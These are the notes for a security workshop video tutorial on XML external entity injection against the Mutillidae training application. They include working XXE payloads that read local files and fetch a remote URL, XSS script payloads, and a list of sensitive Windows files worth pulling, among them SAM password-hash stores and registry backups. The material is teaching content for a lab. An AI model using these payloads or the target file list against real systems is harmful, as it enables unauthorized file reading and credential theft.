Last updated at Mon, 24 Jul 2017 15:50:45 GMT
Title: Video Tutorial: Introduction to XML External Entity Injection
Author: webpwnized
From: ISSA KY Sept 2013 Workshop (Louisville, KY)
Twitter: @webpwnized
This video introduces XML injection to achieve XML external entity injection (XXE) and XML based cross site scripting (XSS). Please find notes used/mentioned in video posted below the video.
1. What is XML injection
2. What is an "entity"
3. What is entity injection
4. Cross site scripting with entity injection
5. Determining local execution path
6. Determining privileges of "user"
7. Directory traversal
8. file:/// protocol
9. Local File Inclusion with entity injection
Firefox --> Burp-Suite --> Apache2 --> PHP App Server --> PHP Code --> XML Parser --> PHP --> Apache2 --> Burp-Suite --> Firefox
Basics
<?xml version="1.0"?><change-log><text>Hello World</text></change-log>
<?xml version="1.0"?><change-log><text>"Hello World"</text></change-log>
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log>
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote """> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log>
Information Disclosure
C:\xampp\htdocs\mutillidae\xml-validator.php
file:///C:/xampp/htdocs/mutillidae/xml-validator.php
Try to cause various errors in order to coax information from XML parser
Try to load files that dont exist
Put whitespace before the XML
Send malformed XML
Determine operating system type and the path at which interpretation is taking place
Cross site scripting
<?xml version="1.0"?><change-log><text><script>alert("FAIL")</script></text></change- log>
<?xml version="1.0"?><change-log><text><script>alert("Hello World")</script></text></change-log>
Local File Inclusion
Try to acquire application configuration files and/or source code files
Try to acquire operating system files
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "robots.txt"> ]><change-log><text>&systemEntity;</text></change-log>
Remote File Inclusion
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "http://192.168.56.102/index.html"> ]><change-log><text>&systemEntity;</text></change-log>
Windows XP SP3
%WINDIR% = C:\WINDOWS
%SYSTEMDRIVE% = C:
%SYSTEMROOT% = C:\WINDOWS
Credit: Rob "Mubix" Fuller
file:///C:\WINDOWS\System32\drivers\etc\hosts
%WINDIR%\System32\drivers\etc\hosts
Blind Files
%SYSTEMDRIVE%\boot.ini
A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.
%WINDIR%\win.ini
This is another file to look for if boot.ini isn't there or coming back, which is sometimes the case.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in \repair is locked, but can be retired using forensic or Volume Shadow copy methods
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system
Files To Pull (if possible)
%SYSTEMDRIVE%\pagefile.sys
Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\iis6.log (5, 6 or 7)
%WINDIR%\system32\logfiles\httperr\httperr1.log
IIS 6 error log
%SystemDrive%\inetpub\logs\LogFiles
IIS 7's logs location
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts